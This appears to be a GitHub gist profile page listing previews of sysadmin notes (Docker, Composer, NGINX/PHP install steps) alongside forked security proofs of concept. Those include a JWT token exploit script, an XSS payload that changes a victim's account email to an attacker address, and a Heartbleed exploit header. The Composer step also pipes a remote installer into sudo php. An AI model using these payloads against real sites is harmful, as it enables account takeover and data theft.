Skip to content

Instantly share code, notes, and snippets.

View mikkz's full-sized avatar
🙃
Just a wannabe 🕵️

Mikko Carreon mikkz

🙃
Just a wannabe 🕵️
View GitHub Profile
@mikkz
mikkz / install-docker.md
Created August 19, 2020 03:07 — forked from npearce/install-docker.md
Amazon Linux 2 - install docker & docker-compose using 'sudo amazon-linux-extras' command

UPDATE (March 2020, thanks @ic): I don't know the exact AMI version but yum install docker now works on the latest Amazon Linux 2. The instructions below may still be relevant depending on the vintage AMI you are using.

Amazon changed the install in Linux 2. One no-longer using 'yum' See: https://aws.amazon.com/amazon-linux-2/release-notes/

Docker CE Install

sudo amazon-linux-extras install docker
sudo service docker start
$ cd ~
$ sudo curl -sS https://getcomposer.org/installer | sudo php
$ sudo mv composer.phar /usr/local/bin/composer
$ sudo ln -s /usr/local/bin/composer /usr/bin/composer
then you can run
$ sudo composer install

Keybase proof

I hereby claim:

  • I am mikkz on github.
  • I am mikkz (https://keybase.io/mikkz) on keybase.
  • I have a public key whose fingerprint is 72E0 8AB8 3F6C 85FB 211D CDA9 9445 9C62 CFB8 340B

To claim this, I am signing this object:

@mikkz
mikkz / rc
Created May 21, 2019 07:43
motd ~/.ssh/rc
if [ -e ~/.ssh/config ]; then
echo
echo Server List\(s\)
echo
cat ~/.ssh/config
echo
elif [ ! -f ~/.ssh/config ]; then
echo
echo No Server Access or ~/.ssh/config Not Found
echo
@mikkz
mikkz / token.py
Created January 28, 2019 11:15 — forked from shawarkhanethicalhacker/token.py
A little automation for obtaining JWT token for a POC
# A sample code that obtains a permanent JWT token when provided a temporary JWT token
import json
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
jwt_token=raw_input("Enter token > ")
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token"
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"}
@mikkz
mikkz / email_change_exploit_xss.js
Created January 28, 2019 11:14 — forked from shawarkhanethicalhacker/email_change_exploit_xss.js
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load',
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
@mikkz
mikkz / heartbleed.py
Created January 14, 2019 08:30 — forked from eelsivart/heartbleed.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
@mikkz
mikkz / bash-cheatsheet.sh
Created January 14, 2019 08:19 — forked from joeneldeasis/bash-cheatsheet.sh
Bash CheatSheet for UNIX Systems
#!/bin/bash
#####################################################
# Name: Bash CheatSheet for Mac OSX
#
# A little overlook of the Bash basics
#
# Usage:
#
# Author: J. Le Coupanec
# Date: 2014/11/04
@mikkz
mikkz / Commands.sh
Created January 14, 2019 08:18 — forked from joeneldeasis/Commands.sh
Install PHP and NGINX on Amazon Linux AMI
## Install NGINX
$ sudo yum install nginx -y
## Install PHP and PHP-FPM
$ sudo yum install php -y
$ sudo yum install php-fpm -y
## Configure NGINX (see below)
$ sudo nano /etc/nginx/conf.d/default.conf